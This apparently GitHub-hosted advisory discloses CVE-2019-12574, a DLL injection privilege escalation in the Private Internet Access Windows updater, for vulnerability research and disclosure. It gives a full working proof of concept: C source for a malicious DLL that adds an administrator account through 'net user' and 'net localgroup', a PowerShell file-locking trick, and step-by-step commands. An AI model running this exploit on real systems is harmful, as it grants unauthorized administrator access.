Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

206 lines (140 sloc) 6.97 KB
Title: PIA Windows Privilege Escalation: DLL Injection
Author: Rich Mirch
CVE: CVE-2019-12574
Vendor Advisory: https://www.privateinternetaccess.com/pages/changelog
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v1.0 for Windows could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.
The PIA Desktop client is vulnerable to a DLL injection vulnerability during
the update process. The updater loads several DLLs from a folder that
authenticated users have write access to. A low privileged user can leverage
this vulnerability to execute arbitrary code as an administrator.
When an update is available a low privilege user is notified in the client and is
presented with the option to download it. When clicked, the PIA client sends a
command to the PIA service to download the update. The update is staged in
"C:\ProgramData\Private Internet Access\update\". This directory and all files
within it are removed prior to storing the update file.
A low privileged user can create a file in the update directory and set a lock on
it which prevents the PIA service from deleting it during the download process.
This can be leveraged to stage a malicious DLL that the update process will load.
The next time an administrator opens the PIA client a new option to install the
latest version will be available. When clicked, the updater will install the update
and silently execute arbitrary code as the administrator. This PoC will demonstrate
that a new administrator named "woot" will be added during the update process.
CVSS
Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:R
Base: 6.7
Temporal: 6.3
The following DLLs are loaded by the pia-windows-x64-1.0-02176.exe
C:\ProgramData\Private Internet Access\update\spinf.dll
C:\ProgramData\Private Internet Access\update\USERENV.dll
C:\ProgramData\Private Internet Access\update\newdev.dll
C:\ProgramData\Private Internet Access\update\DEVRTL.dll
C:\ProgramData\Private Internet Access\update\DEVOBJ.dll
C:\ProgramData\Private Internet Access\update\drvstore.dll
C:\ProgramData\Private Internet Access\update\PROPSYS.dll
C:\ProgramData\Private Internet Access\update\LINKINFO.dll
C:\ProgramData\Private Internet Access\update\ntshrui.dll
C:\ProgramData\Private Internet Access\update\SspiCli.dll
C:\ProgramData\Private Internet Access\update\srvcli.dll
C:\ProgramData\Private Internet Access\update\cscapi.dll
C:\ProgramData\Private Internet Access\update\CLDAPI.dll
C:\ProgramData\Private Internet Access\update\FLTLIB.DLL
C:\ProgramData\Private Internet Access\update\apphelp.dll
C:\ProgramData\Private Internet Access\update\netutils.dll
Permissions of "c:\ProgramData\Private Internet Access" showing
that BUILTIN\Users has write access.
c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Permissions of "c:\ProgramData\Private Internet Access\update" showing
that the test1 user has full access(see step 2).
c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHAOS\test1:(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Test Environment
OS: Microsoft Windows 10 Pro 10.0.17763 N/A Build 17763
PIA Version: v0.9.9 beta
PIA Upgrade Version: v1.0
Steps to reproduce
All steps are executed as a low privileged user unless otherwise noted.
1) Open a cmd shell and change to the "C:\ProgramData\Private Internet Access" folder.
cd "c:\ProgramData\Private Internet Access"
2) Create the update folder and change to it.
mkdir update
cd update
3) Create a malicious library to create an administrator account named woot when loaded.
/* Cross Compile with
x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved )
{
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
system("cmd /c net user woot insertpasswordhere /add");
system("cmd /c net localgroup administrators woot /add");
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}
4) Copy the malicious DLL into the update folder. For this PoC we will use spinf.dll
as the target.
copy woot.dll spinf.dll
5) Execute powershell and set a lock on the spinf.dll file to prevent the library
from being deleted. I appreciate @poshkatz for teaching me how to easily lock files
with PowerShell.
$f = [System.IO.File]::Open("spinf.dll",[System.IO.FileMode]::Open [System.IO.FileAccess]::Read,[System.IO.FileShare]::Read)
6) Verify the lock by typing $f. The output should look like this.
CanRead : True
CanWrite : False
CanSeek : True
IsAsync : False
Length : 287283
Name : c:\ProgramData\Private Internet Access\update\spinf.dll
Position : 0
Handle : 880
SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle
CanTimeout : False
ReadTimeout :
WriteTimeout :
7) Open the PIA client. An update will be available. Click Download v1.0.0.
8) Now that the update is staged, exit all windows and logout.
9) Login as an Administrator.
10) Open the PIA client and click the update icon in the upper right and then
click the "Install v1.0.0" option. The update will install normally.
11) At this point the "woot" administrator account will exist. Open a cmd shell
and verify.
net user woot
Timeline:
2019-01-13: Reported to vendor
2018-01-13: Vendor acknowledged receipt of report
2019-01-22: Vendor released fix in v1.0.1
2019-06-10: Public disclosure
You can’t perform that action at this time.